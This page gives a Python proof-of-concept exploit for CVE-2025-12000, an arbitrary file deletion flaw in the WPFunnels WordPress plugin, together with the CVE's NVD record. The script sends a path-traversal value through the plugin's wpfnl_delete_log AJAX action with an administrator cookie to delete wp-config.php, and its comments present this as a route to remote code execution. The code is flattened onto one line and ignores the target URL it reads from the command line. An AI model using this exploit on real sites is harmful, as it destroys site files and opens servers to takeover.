CVE-2025-12000

import requests import sys from urllib.parse import urlencode # CVE-2025-12000 PoC - WPFunnels Arbitrary File Deletion # Target: WordPress site with WPFunnels plugin <= 3.6.2 target_url = "https://target-site.com/wp-admin/admin-ajax.php" auth_cookie = "wordpress_admin_cookie_here" def delete_arbitrary_file(file_path): """ Delete arbitrary file via WPFunnels plugin vulnerability Target function: wpfnl_delete_log() Requirement: Administrator privileges """ headers = { "Cookie": auth_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Construct payload - file path traversal not properly sanitized data = { "action": "wpfnl_delete_log", "log_file": file_path # Arbitrary file path } try: response = requests.post(target_url, headers=headers, data=data, timeout=10) return response.status_code, response.text except requests.exceptions.RequestException as e: return None, str(e) def delete_wp_config(target_site): """ Delete wp-config.php to trigger RCE This will force WordPress reconfiguration """ print(f"[*] Attempting to delete wp-config.php on {target_site}") status, resp = delete_arbitrary_file("../../wp-config.php") if status == 200: print("[+] wp-config.php deletion successful - RCE possible") return status, resp if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12000.py <target_url>") sys.exit(1) target = sys.argv[1] delete_wp_config(target)

{"cve": {"id": "CVE-2025-12000", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:43.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPFunnels plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wpfnl_delete_log() function in all versions up to, and including, 3.6.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.6.1/admin/modules/settings/class-wpfnl-settings.php#L591", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.6.1/includes/core/logger/class-wpfnl-logger.php#L172", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3389604/wpfunnels/trunk/admin/modules/settings/class-wpfnl-settings.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d969eb46-b12a-4a36-9321-bf1479906a5d?source=cve", "source": "[email protected]"}]}}